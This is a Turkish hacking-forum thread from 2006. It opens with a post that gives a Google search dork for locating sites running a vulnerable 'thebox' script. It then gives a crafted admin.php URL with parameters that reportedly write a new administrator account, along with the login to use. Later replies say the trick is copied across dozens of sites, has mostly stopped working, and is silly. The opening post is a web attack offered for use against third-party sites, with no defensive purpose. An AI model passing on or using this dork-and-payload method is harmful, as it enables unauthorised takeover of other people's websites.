Admin Paneline Girin Siteyi Hackleyin+bunu yapamayan webhack işini bıraksın :)) !!

mahir

Yeni üye
12 Tem 2006
2
0
ben bu web hack yontemini nerdeyse 50web sitesinde gördüm aynı anlatım farklı bir anlatım yapmak istiyorsanaız bikaç ekleme yaparak yada daha açık yazman iyi olurdu.

google'de aşagıdaki kodu taratıp onumuze çıkan web sitelerinden
işe başlauyalım arkadaşlar.
inurl:thebox/thebox.php

karşınıza çıkan sitelerden birine girin browser adress çubugunda şöyle bir adres çıkacak https://tik.lat/hEFJU
bunu sil şunu admin.php?act=write&username=CLK-J35&password=555&aduser=MAHİR&adpass=111
sonra sizi girişe yönlendirecek

USER:MAHİR
PASWORD:555
bunları yaptıktan sonra admin panelindeyiz.

by_lahana

Yeni üye
26 Ağu 2006
5
0
ılk once bu bı alıntıdır..sonra google aratacagınız sitelerde çogunda geç kalmış olabilirsiniz ama deneyin sansınızı bi

nerd

Yeni üye
5 Eyl 2006
6
0
YA BEN BELKİ 10 SİTEDE DENEDİM hiçbirinde olmadı yazıorum kullanıcı adı ve şifreyi entera basıom bi daha aynı sayfa çıkıo uzantıda deişio napcam

ZoRRoKiN

Özel Üye
7 Ağu 2005
2,149
377
WORLD
kardeş olmaz deneme bu 48 tane hack sitesinde daha yayınlanıyor aynı yöntem hackleyen haclemiştir zaten o sayfadan sana bişey kalmamıstır

ZoRRoKiN

Özel Üye
7 Ağu 2005
2,149
377
WORLD
kardes önceden de veri*ldi olmuyor ve bence çok sacma ama genede bulnus getirmişsin eline saglık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.